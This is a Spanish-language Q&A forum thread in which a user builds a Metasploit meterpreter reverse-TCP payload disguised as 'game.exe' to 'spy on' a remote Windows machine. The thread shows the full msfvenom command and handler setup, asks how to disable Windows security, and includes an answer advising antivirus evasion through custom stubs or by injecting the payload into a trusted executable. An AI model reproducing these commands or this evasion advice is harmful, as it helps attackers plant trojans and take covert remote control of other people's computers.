Windows 10 no ejecuta la carga útil de meterpreter

-1

Tengo un problema bastante complejo en mis manos. Recientemente tuve la ambición de probar las nuevas características de Metasploit (en Kali Linux 2017.1). Tengo dos computadoras, así que pensé que este era un ambiente perfecto para la experimentación. Mi "sistema maestro" en este caso fue el portátil HP EliteBook 8760w. Surgieron dos problemas:

Mi principal ambición en ambos casos era monitorear un dispositivo distante a través de diferentes interfaces. En primer lugar, traté de lograr mi objetivo creando un programa de spyware. Aquí está mi procedimiento:

root@smerdjakov:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=8080 -f exe > game.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
root@smerdjakov:~# msfconsole

Metasploit Park, System Security Interface
Version 4.0.5, Alpha E

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.103
lhost => 192.168.0.103
msf exploit(handler) > set lport 8080
lport => 8080
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.0.103:8080 
[*] Starting the payload handler...
msf exploit(handler) >

Hasta este punto, todo salió como estaba previsto: compilé todas las funciones, obtuve el archivo .exe con una carga útil. La idea principal era ejecutar este programa en otra computadora (con el sistema operativo Windows 7/8/10) y el indicador Metasploit iniciaría automáticamente la supervisión del sistema. Sin embargo, cuando intenté ejecutar mi game.exe como administrador en Windows 10, apareció este mensaje:

Operation did not complete successfully because a file contains a virus or
potentially unwanted software.

Agregué una fuerte capa de cifrado, por lo que me pareció peculiar que mi programa no se iniciara. En mi Kali Linux abrí game.exe con Leafpad. Todo lo que encontré fue:

 MZ

¿Esto es normal? En primer lugar, me gustaría saber cómo desactivar la seguridad de Windows completamente y, en segundo lugar, si mi archivo game.exe es funcional. Debo mencionar que después de 'MZ' hay otro glifo que la interfaz StackExchange no puede interpretar: parece un cuadrado con dos ceros en la parte superior y un 9 y un 0 en la parte inferior. Al igual que:

MZ 0 0
   9 0

Tu ayuda es muy apreciada. Gracias de antemano.

    
pregunta Gregor Perčič 16.07.2017 - 15:43
fuente

1 respuesta

3

Bueno, el problema aquí parece ser un problema de evadir tu antivirus de Windows. Dado que la evasión AV es uno de los temas favoritos, ¡me permite dar algunos consejos útiles!

-msfvenom ofrece muchos codificadores diferentes para escribir tus exploits, sin embargo, codificar tu archivo exe varias veces no significa que pasará por alto AV. En la práctica, los codificadores se utilizan para deshacerse de caracteres defectuosos en una carga útil, etc.

-La mejor manera de superar el programa antivirus es escribir su propio archivo ejecutable, esto significa crear sus propios apéndices, plantillas, etc. Intente leer esto enlace

-O mi favorito personal, inyecte su carga útil en un archivo exe preexistente (¿quizás un programa confiable ...?) lea esto a enlace

Buena suerte

    
respondido por el Paul_C 10.08.2017 - 17:59
fuente

Lea otras preguntas en las etiquetas